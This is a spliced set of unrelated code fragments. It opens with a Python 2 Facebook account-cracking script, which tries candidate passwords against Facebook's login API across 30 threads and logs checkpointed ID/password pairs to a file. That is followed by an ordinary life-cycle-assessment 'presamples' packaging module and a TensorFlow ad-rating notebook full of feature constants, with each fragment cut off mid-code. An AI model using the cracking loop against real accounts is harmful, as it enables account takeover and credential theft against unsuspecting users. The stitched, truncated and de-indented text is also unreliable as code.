data10 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga10 = json.load(data10)
if 'access_token' in naga10:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos10
oke.append(ubd + bos10)
elif 'www.facebook.com' in naga10['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos10
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos10 + '\n')
cek.close()
cpe.append(ubd + bos10)
else:
bos11 = 'Bangladesh'
data11 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=23<PASSWORD>09591655%25257C0<PASSWORD>&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga11 = json.load(data11)
if 'access_token' in naga11:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos11
oke.append(ubd + bos11)
elif 'www.facebook.com' in naga11['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos11
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos11 + '\n')
cek.close()
cpe.append(ubd + bos11)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;94m+\x1b[1;97m] \x1b[1;97mSelesai ....'
print '\x1b[1;97m[\x1b[1;94m+\x1b[1;97m] \x1b[1;97mTotal \x1b[1;92mOK\x1b[1;97m/\x1b[1;94mCP \x1b[1;97m: \x1b[1;92m' + str(len(oke)) + | |
# Repository: tngTUDOR/presamples
from copy import deepcopy
from pathlib import Path
import json
import numpy as np
import os
import shutil
import uuid
import copy
import warnings
from .errors import InconsistentSampleNumber, ShapeMismatch, NameConflicts
from .utils import validate_presamples_dirpath, md5
try:
from bw2data.utils import TYPE_DICTIONARY
from bw2data import projects, mapping
except ImportError:
TYPE_DICTIONARY = {
"unknown": -1,
"production": 0,
"technosphere": 1,
"biosphere": 2,
"substitution": 3,
}
projects = None
mapping = {}
# Max signed 32 bit integer, compatible with Windows
MAX_SIGNED_32BIT_INT = 2147483647
to_array = lambda x: np.array(x) if not isinstance(x, np.ndarray) else x
to_2d = lambda x: np.reshape(x, (1, -1)) if len(x.shape) == 1 else x
def split_inventory_presamples(samples, indices):
"""Split technosphere and biosphere presamples.
``samples`` is a Numpy array with rows of exchanges and columns of samples. ``indices`` is a list of ``[(input key, output key, type)]``, where ``type`` is like "biosphere" or "technosphere". Everything which isn't type ``biosphere`` will be added to the technosphere presamples.
Returns a list of ((biosphere samples, biosphere indices, label), (technosphere samples, technosphere indices, label)) - but will skip either element if there are no samples.
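Example (illustrative only; the keys and values below are made up). With one biosphere and one technosphere exchange and three samples each::

    samples = np.array([[1.0, 1.1, 0.9],
                        [2.0, 2.2, 1.8]])
    indices = [(("bio", "co2"), ("db", "act"), "biosphere"),
               (("db", "input"), ("db", "act"), "technosphere")]
    split_inventory_presamples(samples, indices)
    # -> [(row 0 as a 1x3 array, [(("bio", "co2"), ("db", "act"))], "biosphere"),
    #     (row 1 as a 1x3 array, [(("db", "input"), ("db", "act"), "technosphere")], "technosphere")]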
"""
assert isinstance(samples, np.ndarray)
if samples.shape[0] != len(indices):
raise ShapeMismatch("Shape mismatch: {}, {}".format(samples.shape[0], len(indices)))
mask = np.array([o[2] in (2, 'biosphere') for o in indices])
no_empty = lambda lst: [o for o in lst if o[1]]
return no_empty([
(
samples[mask, :],
[o[:2] for o in indices if o[2] in (2, "biosphere")],
"biosphere"
), (
samples[~mask, :],
[o for o in indices if o[2] not in (2, "biosphere")],
"technosphere"
),
])
def format_technosphere_presamples(indices):
"""Format technosphere presamples into an array.
Input data has the form ``[(input id, output id, type)]``. Both the input and output ids can be mapped already, but normally aren't; the ``type`` may be mapped or not.
Returns an array with columns ``[('input', np.uint32), ('output', np.uint32), ('row', np.uint32), ('col', np.uint32), ('type', np.uint8)]`` (``row`` and ``col`` are filled with ``MAX_SIGNED_32BIT_INT`` until mapped), and the following metadata::
{
'row from label': 'input',
'row to label': 'row',
'row dict': '_product_dict',
'col from label': 'output',
'col to label': 'col',
'col dict': '_activity_dict',
'matrix': 'technosphere_matrix'
}
"""
metadata = {
'row from label': 'input',
'row to label': 'row',
'row dict': '_product_dict',
'col from label': 'output',
'col to label': 'col',
'col dict': '_activity_dict',
'matrix': 'technosphere_matrix'
}
dtype = [
('input', np.uint32),
('output', np.uint32),
('row', np.uint32),
('col', np.uint32),
('type', np.uint8),
]
def func(row):
return (
mapping.get(row[0], row[0]),
mapping.get(row[1], row[1]),
MAX_SIGNED_32BIT_INT,
MAX_SIGNED_32BIT_INT,
TYPE_DICTIONARY.get(row[2], row[2])
)
return format_matrix_data(indices, 'technosphere', dtype, func, metadata)
def format_biosphere_presamples(indices):
"""Format biosphere presamples into an array.
Input data has the form ``[(flow id, activity id)]``, where both ids are **unmapped**.
Returns an array with columns ``[('input', np.uint32), ('output', np.uint32), ('row', np.uint32), ('col', np.uint32)]`` (``row`` and ``col`` are filled with ``MAX_SIGNED_32BIT_INT`` until mapped), and the following metadata::
{
'row from label': 'input',
'row to label': 'row',
'row dict': '_biosphere_dict',
'col from label': 'output',
'col to label': 'col',
'col dict': '_activity_dict',
'matrix': 'biosphere_matrix'
}
"""
metadata = {
'row from label': 'input',
'row to label': 'row',
'row dict': '_biosphere_dict',
'col from label': 'output',
'col to label': 'col',
'col dict': '_activity_dict',
'matrix': 'biosphere_matrix'
}
dtype = [
('input', np.uint32),
('output', np.uint32),
('row', np.uint32),
('col', np.uint32),
]
def func(row):
return (
mapping.get(row[0], row[0]),
mapping.get(row[1], row[1]),
MAX_SIGNED_32BIT_INT,
MAX_SIGNED_32BIT_INT,
)
return format_matrix_data(indices, 'biosphere', dtype, func, metadata)
def format_cf_presamples(indices):
"""Format characterization factor presamples into an array.
Input data has the form ``[flow id]``, where ``flow id`` is an **unmapped** biosphere flow key like ``('biosphere', 'something')``.
Returns an array with columns ``[('flow', np.uint32), ('row', np.uint32)]`` (``row`` is filled with ``MAX_SIGNED_32BIT_INT`` until mapped), and the following metadata::
{
'row from label': 'flow',
'row to label': 'row',
'row dict': '_biosphere_dict',
'matrix': 'characterization_matrix'
}
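Example (illustrative sketch; integer flow ids are used here because the module-level ``mapping`` is empty when ``bw2data`` is not installed)::

    arr, metadata = format_cf_presamples([101, 102])
    arr["flow"]  # array([101, 102], dtype=uint32)
    arr["row"]   # filled with MAX_SIGNED_32BIT_INT until mapped to matrix rows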
"""
metadata = {
'row from label': 'flow',
'row to label': 'row',
'row dict': '_biosphere_dict',
'matrix': 'characterization_matrix'
}
dtype = [
('flow', np.uint32),
('row', np.uint32),
]
func = lambda row: (mapping.get(row, row), MAX_SIGNED_32BIT_INT)
return format_matrix_data(indices, 'cf', dtype, func, metadata)
FORMATTERS = {
'technosphere': format_technosphere_presamples,
'biosphere': format_biosphere_presamples,
'cf': format_cf_presamples,
}
def validate_matrix_data_metadata(metadata, dtype):
"""Make sure ``metdata`` has the required keys, and that ``indices`` agress with ``metadata``."""
ROWS = ('row from label', 'row to label', 'row dict', 'matrix')
COLUMNS = ('col from label', 'col to label', 'col dict')
if not all(field in metadata for field in ROWS):
raise ValueError("Must give each of {}".format(ROWS))
if "col dict" in metadata and not \
all(field in metadata for field in COLUMNS):
raise ValueError("Must give each of {}".format(COLUMNS))
col_names = {x[0] for x in dtype}
metadata_names = {v for k, v in metadata.items() if "label" in k}
missing = metadata_names.difference(col_names)
if missing:
raise ValueError("The following necessary columns are not in the "
"indices: {}".format(missing))
def format_matrix_data(indices, kind, dtype=None, row_formatter=None, metadata=None):
if dtype is None and row_formatter is None and metadata is None:
try:
return FORMATTERS[kind](indices)
except KeyError:
raise KeyError("Can't find formatter for {}".format(kind))
elif dtype is None or row_formatter is None or metadata is None:
raise ValueError("Must provide ``dtype``, ``row_formatter``, and ``metadata``")
else:
validate_matrix_data_metadata(metadata, dtype)
array = np.zeros(len(indices), dtype=dtype)
for index, row in enumerate(indices):
array[index] = row_formatter(row)
return array, metadata
def get_presample_directory(id_, overwrite=False, dirpath=None):
if dirpath is None:
if projects:
dirpath = Path(projects.request_directory('presamples')) / id_
else:
dirpath = Path(os.getcwd()) / id_
else:
dirpath = Path(dirpath) / id_
if os.path.isdir(dirpath):
if not overwrite:
raise ValueError("The presampled directory {} already exists".format(dirpath))
else:
shutil.rmtree(dirpath)
os.mkdir(dirpath)
return dirpath
def create_presamples_package(matrix_data=None, parameter_data=None, name=None,
id_=None, overwrite=False, dirpath=None, seed=None, collapse_repeated_indices=True):
"""Create and populate a new presamples package
The presamples package minimally contains a datapackage file with metadata on the
datapackage itself and its associated resources (stored presample arrays and
identification of what the values in the arrays represent).
Parameters
----------
matrix_data: list, optional
list of tuples containing raw matrix data (presamples array, indices, matrix label)
parameter_data: list, optional
list of tuples containing raw parameter data (presamples array, names, label)
name: str, optional
A human-readable name for these samples.
id_: str, optional
Unique id for this collection of presamples. Optional, generated automatically if not set.
overwrite: bool, default=False
If True, replace an existing presamples package with the same ``id_`` if it exists.
dirpath: str, optional
An optional directory path where presamples can be created. If None, the package is created in a subdirectory of the ``project`` folder.
seed: {None, int, "sequential"}, optional
Seed used by indexer to return array columns in random order. Can be an integer, "sequential" or None.
collapse_repeated_indices: bool, default=True
Indicates whether samples for the same matrix cell in a given array should be summed.
If False then only the last sample values are used.
Notes
-----
Both ``matrix_data`` and ``parameter_data`` are optional, but at least one needs to be passed.
Both matrix and parameter data should have the same number of possible values (i.e. the same number of samples).
The documentation gives more details on the format of these two arguments.
Returns
-------
id_: str
The unique ``id_`` of the presamples package
dirpath: str
The absolute path of the created directory.
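Example (illustrative sketch; the ids and values are made up and assumed to be already-mapped integers, e.g. when ``bw2data`` is not installed)::

    samples = np.array([[1.0, 1.2], [0.5, 0.6]])
    indices = [(10, 11, "technosphere"), (12, 11, "technosphere")]
    id_, dirpath = create_presamples_package(
        matrix_data=[(samples, indices, "technosphere")],
        name="example-presamples",
        seed=42,
    )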
"""
id_ = id_ or uuid.uuid4().hex
name = name or id_
if dirpath is not None:
assert os.path.isdir(dirpath), "`dirpath` must be a directory"
assert os.access(dirpath, os.W_OK), "`dirpath` must be a writable directory"
dirpath = os.path.abspath(dirpath)
dirpath = get_presample_directory(id_, overwrite, dirpath=dirpath)
num_iterations = None
datapackage = {
"name": str(name),
"id": id_,
"profile": "data-package",
"seed": seed,
"resources": []
}
if not matrix_data and not parameter_data:
raise ValueError("Must specify at least one of `matrix_data` and `parameter_data`")
def elems(lst, label):
"""Yield elements from ``lst``. If an element is a model instance, iterate over its components."""
for elem in lst:
if hasattr(elem, label):
for obj in getattr(elem, label):
yield obj
else:
yield elem
# Not defined if matrix_data is empty
index = -1
for index, row in enumerate(elems(matrix_data or [], "matrix_data")):
samples, indices, kind, *other = row
samples = to_2d(to_array(samples))
if num_iterations is None:
num_iterations = samples.shape[1]
if samples.shape[1] != num_iterations:
raise InconsistentSampleNumber("Inconsistent number of samples: "
"{} and {}".format(samples.shape[1], num_iterations))
indices, metadata = format_matrix_data(indices, kind, *other)
if kind in ['technosphere', 'biosphere']:
if collapse_repeated_indices: # Avoid cf matrices for now
samples, indices = collapse_matrix_indices(samples, indices, kind)
else:
io_cols = indices[['input', 'output']]
unique = np.unique(io_cols)
if len(unique) != samples.shape[0]:
warnings.warn(UserWarning('Multiple samples in a given array were supplied '
'for the same matrix cell; only the last sample values will be used.'))
#!/usr/bin/env python
# coding: utf-8
# ! ./setup.sh # uncomment if you wish to install any new packages
get_ipython().run_line_magic('matplotlib', 'inline')
import tensorflow as tf
import tensorflow_docs as tfdocs
import tensorflow_docs.modeling
import sys
from pathlib import Path
import datetime
import time
import numpy as np
import pandas as pd
from pprint import pprint
from typing import Dict, Any, Union, List, Tuple
from functools import partial
import re
import string
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.metrics import confusion_matrix
from math import ceil
from collections import namedtuple
from sklearn.model_selection import train_test_split
import pickle
import chakin
import json
import os
from collections import defaultdict
import zipfile
import sqlite3
import logging
from tempfile import TemporaryDirectory
from fastprogress import progress_bar
from imblearn.over_sampling import SMOTE
from imblearn.under_sampling import NearMiss
from imblearn.over_sampling import RandomOverSampler
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Embedding
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import concatenate
from aif360.metrics import BinaryLabelDatasetMetric
from aif360.algorithms.preprocessing import Reweighing
from aif360.datasets import BinaryLabelDataset # To handle the data
import matplotlib.pyplot as plt
import seaborn as sns
from EmbeddingFactory import EmbeddingFactory
pd.set_option('display.max_rows', None)
print(f"Using Tensorflow, {tf.__version__} on Python interpreter, {sys.version_info}")
RANDOM_SEED = int(time.time())
tf.random.set_seed(RANDOM_SEED)
np.random.seed(RANDOM_SEED)
print(f"Using random seed, {RANDOM_SEED}")
DATA_FOLDER = Path("../../dataset/")
BATCH_SIZE = 4096  # larger batches train faster but need more RAM
TARGET_COL = "Rating"
# data file paths are relative to DATA_FOLDER
users_ads_rating_csv = DATA_FOLDER/"users-ads-without-gcp-ratings_OHE_MLB_FAV_UNFAV_Merged.csv"
USER_ID = "UserId"
AD_ID = "AdId"
AGE = "Age"
ZIP_CODE = "CapZipCode"
COUNTRIES_VISITED = "Countriesvisited"
FAVE_SPORTS = "FaveSports"
GENDER = "Gender"
HOME_COUNTRY = "Homecountry"
HOME_TOWN = "Hometown"
INCOME = "Income"
LAST_NAME = "LastName"
MOST_LISTENED_MUSICS = "Mostlistenedmusics"
MOST_READ_BOOKS = "Mostreadbooks"
MOST_VISITED_WEBSITES = "Mostvisitedwebsites"
MOST_WATCHED_MOVIES = "Mostwatchedmovies"
MOST_WATCHED_TV_PROGRAMMES = "Mostwatchedtvprogrammes"
NAME = "Name"
PAYPAL = "Paypal"
TIMEPASS = "Timepass"
TYPE_OF_JOB = "TypeofJob"
WEEKLY_WORKING_HOURS = "Weeklyworkinghours"
ADFILEPATH = "AdFilePath"
GENDER_F = "Gender_F"
GENDER_M = "Gender_M"
# HomeCountry = 12 Columns
HOMECOUNTRY_CANADA = "Homecountry_Canada"
HOMECOUNTRY_CZECHREPUBLIC = "Homecountry_CzechRepublic"
HOMECOUNTRY_GREATBRITAIN = "Homecountry_GreatBritain"
HOMECOUNTRY_INDIA = "Homecountry_India"
HOMECOUNTRY_ITALY = "Homecountry_Italy"
HOMECOUNTRY_PHILLIPINES = "Homecountry_Phillipines"
HOMECOUNTRY_ROMANIA = "Homecountry_Romania"
HOMECOUNTRY_SAUDIARABIA = "Homecountry_SaudiArabia"
HOMECOUNTRY_SINGAPORE = "Homecountry_Singapore"
HOMECOUNTRY_SLOVENIA = "Homecountry_Slovenia"
HOMECOUNTRY_UNITEDKINGDOM = "Homecountry_UnitedKingdom"
HOMECOUNTRY_UNITEDSTATESOFAMERICA = "Homecountry_UnitedStatesofAmerica"
# Income = 4 Columns
INCOME_0 = "Income_0"
INCOME_1 = "Income_1"
INCOME_2 = "Income_2"
INCOME_3 = "Income_3"
# Mostlistenedmusics = 22 Columns
MOSTLISTENEDMUSICS_1 = "AlternativeMusic"
MOSTLISTENEDMUSICS_2 = "AsianPopJPoporKpop"
MOSTLISTENEDMUSICS_3 = "Blues"
MOSTLISTENEDMUSICS_4 = "ClassicalMusic"
MOSTLISTENEDMUSICS_5 = "CountryMusic"
MOSTLISTENEDMUSICS_6 = "DanceMusic"
MOSTLISTENEDMUSICS_7 = "EasyListening"
MOSTLISTENEDMUSICS_8 = "ElectronicMusic"
MOSTLISTENEDMUSICS_9 = "EuropeanMusicFolkPop"
MOSTLISTENEDMUSICS_10 = "HipHopRap"
MOSTLISTENEDMUSICS_11 = "IndiePop"
MOSTLISTENEDMUSICS_12 = "InspirationalinclGospel"
MOSTLISTENEDMUSICS_13 = "Jazz"
MOSTLISTENEDMUSICS_14 = "LatinMusic"
MOSTLISTENEDMUSICS_15 = "NewAge"
MOSTLISTENEDMUSICS_16 = "Opera"
MOSTLISTENEDMUSICS_17 = "PopPopularmusic"
MOSTLISTENEDMUSICS_18 = "RampBSoul"
MOSTLISTENEDMUSICS_19 = "Reggae"
MOSTLISTENEDMUSICS_20 = "Rock"
MOSTLISTENEDMUSICS_21 = "SingerSongwriterincFolk"
MOSTLISTENEDMUSICS_22 = "WorldMusicBeats"
# Mostreadbooks = 31 Columns
MOSTREADBOOKS_1 = "ActionandAdventure"
MOSTREADBOOKS_2 = "Anthologies"
MOSTREADBOOKS_3 = "Art"
MOSTREADBOOKS_4 = "Autobiographies"
MOSTREADBOOKS_5 = "Biographies"
MOSTREADBOOKS_6 = "Childrens"
MOSTREADBOOKS_7 = "Childrensliterature"
MOSTREADBOOKS_8 = "Comics"
MOSTREADBOOKS_9 = "Cookbooks"
MOSTREADBOOKS_10 = "Diaries"
MOSTREADBOOKS_11 = "Drama"
MOSTREADBOOKS_12 = "Encyclopedias"
MOSTREADBOOKS_13 = "Eroticfiction"
MOSTREADBOOKS_14 = "Fantasy"
MOSTREADBOOKS_15 = "Guide"
MOSTREADBOOKS_16 = "History"
MOSTREADBOOKS_17 = "Horror"
MOSTREADBOOKS_18 = "Journals"
MOSTREADBOOKS_19 = "Math"
MOSTREADBOOKS_20 = "Mystery"
MOSTREADBOOKS_21 = "Poetry"
MOSTREADBOOKS_22 = "Prayerbooks"
MOSTREADBOOKS_23 = "Religious"
MOSTREADBOOKS_24 = "Romance"
MOSTREADBOOKS_25 = "Satire"
MOSTREADBOOKS_26 = "Science"
MOSTREADBOOKS_27 = "Sciencefiction"
MOSTREADBOOKS_28 = "Selfhelp"
MOSTREADBOOKS_29 = "Series"
MOSTREADBOOKS_30 = "Travel"
MOSTREADBOOKS_31 = "Trilogies"
# Mostwatchedmovies = 21 Columns
MOSTWATCHEDMOVIES_1 = "Mostwatchedmovies_Action"
MOSTWATCHEDMOVIES_2 = "Mostwatchedmovies_Adventure"
MOSTWATCHEDMOVIES_3 = "Mostwatchedmovies_Animation"
MOSTWATCHEDMOVIES_4 = "Mostwatchedmovies_Biography"
MOSTWATCHEDMOVIES_5 = "Mostwatchedmovies_Comedy"
MOSTWATCHEDMOVIES_6 = "Mostwatchedmovies_CrimeandGangster"
MOSTWATCHEDMOVIES_7 = "Mostwatchedmovies_Documentary"
MOSTWATCHEDMOVIES_8 = "Mostwatchedmovies_Drama"
MOSTWATCHEDMOVIES_9 = "Mostwatchedmovies_EpicHistorical"
MOSTWATCHEDMOVIES_10 = "Mostwatchedmovies_Erotic"
MOSTWATCHEDMOVIES_11 = "Mostwatchedmovies_Family"
MOSTWATCHEDMOVIES_12 = "Mostwatchedmovies_Fantasy"
MOSTWATCHEDMOVIES_13 = "Mostwatchedmovies_Horror"
MOSTWATCHEDMOVIES_14 = "Mostwatchedmovies_Musical"
MOSTWATCHEDMOVIES_15 = "Mostwatchedmovies_Mystery"
MOSTWATCHEDMOVIES_16 = "Mostwatchedmovies_Romance"
MOSTWATCHEDMOVIES_17 = "Mostwatchedmovies_SciFi"
MOSTWATCHEDMOVIES_18 = "Mostwatchedmovies_Sport"
MOSTWATCHEDMOVIES_19 = "Mostwatchedmovies_Thriller"
MOSTWATCHEDMOVIES_20 = "Mostwatchedmovies_War"
MOSTWATCHEDMOVIES_21 = "Mostwatchedmovies_Western"
# Mostwatchedtvprogrammes = 11 Columns
MOSTWATCHEDTVPROGRAMMES_1 = "Mostwatchedtvprogrammes_Childrens"
MOSTWATCHEDTVPROGRAMMES_2 = "Mostwatchedtvprogrammes_Comedy"
MOSTWATCHEDTVPROGRAMMES_3 = "Mostwatchedtvprogrammes_Drama"
MOSTWATCHEDTVPROGRAMMES_4 = "Mostwatchedtvprogrammes_EntertainmentVarietyShows"
MOSTWATCHEDTVPROGRAMMES_5 = "Mostwatchedtvprogrammes_Factual"
MOSTWATCHEDTVPROGRAMMES_6 = "Mostwatchedtvprogrammes_Learning"
MOSTWATCHEDTVPROGRAMMES_7 = "Mostwatchedtvprogrammes_Music"
MOSTWATCHEDTVPROGRAMMES_8 = "Mostwatchedtvprogrammes_News"
MOSTWATCHEDTVPROGRAMMES_9 = "Mostwatchedtvprogrammes_ReligionampEthics"
MOSTWATCHEDTVPROGRAMMES_10 = "Mostwatchedtvprogrammes_Sport"
MOSTWATCHEDTVPROGRAMMES_11 = "Mostwatchedtvprogrammes_Weather"
RATING = "Rating"
AD_NUM_FACES = "ad_num_faces"
AD_LABEL_FEATURE_1 = 'ad_isAdvertising'
AD_LABEL_FEATURE_2 = 'ad_isBrand'
AD_LABEL_FEATURE_3 = 'ad_isElectronicdevice'
AD_LABEL_FEATURE_4 = 'ad_isElectronics'
AD_LABEL_FEATURE_5 = 'ad_isFashionaccessory'
AD_LABEL_FEATURE_6 = 'ad_isFictionalcharacter'
AD_LABEL_FEATURE_7 = 'ad_isFont'
AD_LABEL_FEATURE_8 = 'ad_isFurniture'
AD_LABEL_FEATURE_9 = 'ad_isGadget'
AD_LABEL_FEATURE_10 = 'ad_isGames'
AD_LABEL_FEATURE_11 = 'ad_isGraphicdesign'
AD_LABEL_FEATURE_12 = 'ad_isGraphics'
AD_LABEL_FEATURE_13 = 'ad_isJewellery'
AD_LABEL_FEATURE_14 = 'ad_isLine'
AD_LABEL_FEATURE_15 = 'ad_isLogo'
AD_LABEL_FEATURE_16 = 'ad_isMagenta'
AD_LABEL_FEATURE_17 = 'ad_isMaterialproperty'
AD_LABEL_FEATURE_18 = 'ad_isMultimedia'
AD_LABEL_FEATURE_19 = 'ad_isProduct'
AD_LABEL_FEATURE_20 = 'ad_isRectangle'
AD_LABEL_FEATURE_21 = 'ad_isSkin'
AD_LABEL_FEATURE_22 = 'ad_isTechnology'
AD_LABEL_FEATURE_23 = 'ad_isText'
AD_LABEL_FEATURE_24 = 'ad_isVehicle'
AD_LABEL_FEATURE_25 = 'ad_isYellow'
AD_SAFESEARCH_FEATURE_1 = 'ad_isAdult_UNLIKELY'
AD_SAFESEARCH_FEATURE_2 ='ad_isAdult_VERY_UNLIKELY'
AD_SAFESEARCH_FEATURE_3 ='ad_isSpoof_POSSIBLE'
AD_SAFESEARCH_FEATURE_4 ='ad_isSpoof_UNLIKELY'
AD_SAFESEARCH_FEATURE_5 ='ad_isSpoof_VERY_UNLIKELY'
AD_SAFESEARCH_FEATURE_6 ='ad_isMedical_POSSIBLE'
AD_SAFESEARCH_FEATURE_7 ='ad_isMedical_UNLIKELY'
AD_SAFESEARCH_FEATURE_8 ='ad_isMedical_VERY_UNLIKELY'
AD_SAFESEARCH_FEATURE_9 ='ad_isViolence_VERY_UNLIKELY'
AD_SAFESEARCH_FEATURE_10 ='ad_isRacy_POSSIBLE'
AD_SAFESEARCH_FEATURE_11 ='ad_isRacy_UNLIKELY'
AD_SAFESEARCH_FEATURE_12 ='ad_isRacy_VERY_LIKELY'
AD_SAFESEARCH_FEATURE_13 ='ad_isRacy_VERY_UNLIKELY'
AD_OBJECT_FEATURE_1 = 'ad_isAnimal'
AD_OBJECT_FEATURE_2 ='ad_isBelt'
AD_OBJECT_FEATURE_3 ='ad_isBottle'
AD_OBJECT_FEATURE_4 ='ad_isBox'
AD_OBJECT_FEATURE_5 ='ad_isCameralens'
AD_OBJECT_FEATURE_6 ='ad_isChair'
AD_OBJECT_FEATURE_7 ='ad_isClothing'
AD_OBJECT_FEATURE_8 ='ad_isEarrings'
AD_OBJECT_FEATURE_9 ='ad_isFood'
AD_OBJECT_FEATURE_10 ='ad_isHat'
AD_OBJECT_FEATURE_11 ='ad_isLuggagebags'
AD_OBJECT_FEATURE_12 ='ad_isMobilephone'
AD_OBJECT_FEATURE_13 ='ad_isNecklace'
AD_OBJECT_FEATURE_14 ='ad_isPackagedgoods'
AD_OBJECT_FEATURE_15 ='ad_isPants'
AD_OBJECT_FEATURE_16 ='ad_isPen'
AD_OBJECT_FEATURE_17 ='ad_isPerson'
AD_OBJECT_FEATURE_18 ='ad_isPillow'
AD_OBJECT_FEATURE_19 ='ad_isPoster'
AD_OBJECT_FEATURE_20 ='ad_isShoe'
AD_OBJECT_FEATURE_21 ='ad_isTop'
AD_OBJECT_FEATURE_22 ='ad_isToy'
AD_OBJECT_FEATURE_23 ='ad_isWatch'
AD_OBJECT_FEATURE_24 ='ad_isWheel'
FAV = 'fav'
UNFAV = 'unfav'
# Read all columns as strings to avoid any errors
COL_DEFAULTS = {
USER_ID: "**",
AD_ID: "**",
AGE: "**",
ZIP_CODE: "**",
COUNTRIES_VISITED: "**",
FAVE_SPORTS: "**",
GENDER: "**",
HOME_COUNTRY: "**",
HOME_TOWN: "**",
INCOME: "**",
LAST_NAME: "**",
MOST_LISTENED_MUSICS: "**",
MOST_READ_BOOKS: "**",
MOST_VISITED_WEBSITES: "**",
MOST_WATCHED_MOVIES: "**",
MOST_WATCHED_TV_PROGRAMMES: "**",
NAME: "**",
PAYPAL: "**",
TIMEPASS: "**",
TYPE_OF_JOB: "**",
WEEKLY_WORKING_HOURS: "**",
ADFILEPATH: "**",
GENDER_F: "**",
GENDER_M: "**",
HOMECOUNTRY_CANADA: "**",
HOMECOUNTRY_CZECHREPUBLIC: "**",
HOMECOUNTRY_GREATBRITAIN: "**",
HOMECOUNTRY_INDIA: "**",
HOMECOUNTRY_ITALY: "**",
HOMECOUNTRY_PHILLIPINES: "**",
HOMECOUNTRY_ROMANIA: "**",
HOMECOUNTRY_SAUDIARABIA: "**",
HOMECOUNTRY_SINGAPORE: "**",
HOMECOUNTRY_SLOVENIA: "**",
HOMECOUNTRY_UNITEDKINGDOM: "**",
HOMECOUNTRY_UNITEDSTATESOFAMERICA: "**",
INCOME_0: "**",
INCOME_1: "**",
INCOME_2: "**",
INCOME_3: "**",
MOSTLISTENEDMUSICS_1: "**",
MOSTLISTENEDMUSICS_2: "**",
MOSTLISTENEDMUSICS_3: "**",
MOSTLISTENEDMUSICS_4: "**",
MOSTLISTENEDMUSICS_5: "**",
MOSTLISTENEDMUSICS_6: "**",
MOSTLISTENEDMUSICS_7: "**",
MOSTLISTENEDMUSICS_8: "**",
MOSTLISTENEDMUSICS_9: "**",
MOSTLISTENEDMUSICS_10: "**",
MOSTLISTENEDMUSICS_11: "**",
MOSTLISTENEDMUSICS_12: "**",
MOSTLISTENEDMUSICS_13: "**",
MOSTLISTENEDMUSICS_14: "**",
MOSTLISTENEDMUSICS_15: "**",
MOSTLISTENEDMUSICS_16: "**",
MOSTLISTENEDMUSICS_17: "**",
MOSTLISTENEDMUSICS_18: "**",
MOSTLISTENEDMUSICS_19: "**",
MOSTLISTENEDMUSICS_20: "**",
MOSTLISTENEDMUSICS_21: "**",
MOSTLISTENEDMUSICS_22: "**",
MOSTREADBOOKS_1: "**",
MOSTREADBOOKS_2: "**",
MOSTREADBOOKS_3: "**",
MOSTREADBOOKS_4: "**",
MOSTREADBOOKS_5: "**",
MOSTREADBOOKS_6: "**",
MOSTREADBOOKS_7: "**",
MOSTREADBOOKS_8: "**",
MOSTREADBOOKS_9: "**",
MOSTREADBOOKS_10: "**",
MOSTREADBOOKS_11: "**",
MOSTREADBOOKS_12: "**",
MOSTREADBOOKS_13: "**",
MOSTREADBOOKS_14: "**",
MOSTREADBOOKS_15: "**",
MOSTREADBOOKS_16: "**",
MOSTREADBOOKS_17: "**",
MOSTREADBOOKS_18: "**",
MOSTREADBOOKS_19: "**",
MOSTREADBOOKS_20: "**",
MOSTREADBOOKS_21: "**",
MOSTREADBOOKS_22: "**",
MOSTREADBOOKS_23: "**",
MOSTREADBOOKS_24: "**",
MOSTREADBOOKS_25: "**",
MOSTREADBOOKS_26: "**",
MOSTREADBOOKS_27: "**",
MOSTREADBOOKS_28: "**",
MOSTREADBOOKS_29: "**",
MOSTREADBOOKS_30: "**",
MOSTREADBOOKS_31: "**",
MOSTWATCHEDMOVIES_1: "**",
MOSTWATCHEDMOVIES_2: "**",
MOSTWATCHEDMOVIES_3: "**",
MOSTWATCHEDMOVIES_4: "**",
MOSTWATCHEDMOVIES_5: "**",
MOSTWATCHEDMOVIES_6: "**",
MOSTWATCHEDMOVIES_7: "**",
MOSTWATCHEDMOVIES_8: "**",
MOSTWATCHEDMOVIES_9: "**",
MOSTWATCHEDMOVIES_10: "**",
MOSTWATCHEDMOVIES_11: "**",
MOSTWATCHEDMOVIES_12: "**",
MOSTWATCHEDMOVIES_13: "**",
MOSTWATCHEDMOVIES_14: "**",
MOSTWATCHEDMOVIES_15: "**",
MOSTWATCHEDMOVIES_16: "**",
MOSTWATCHEDMOVIES_17: "**",
MOSTWATCHEDMOVIES_18: "**",
MOSTWATCHEDMOVIES_19: "**",
MOSTWATCHEDMOVIES_20: "**",
MOSTWATCHEDMOVIES_21: "**",
MOSTWATCHEDTVPROGRAMMES_1: "**",
MOSTWATCHEDTVPROGRAMMES_2: "**",
MOSTWATCHEDTVPROGRAMMES_3: "**",
MOSTWATCHEDTVPROGRAMMES_4: "**",
MOSTWATCHEDTVPROGRAMMES_5: "**",
MOSTWATCHEDTVPROGRAMMES_6: "**",
MOSTWATCHEDTVPROGRAMMES_7: "**",
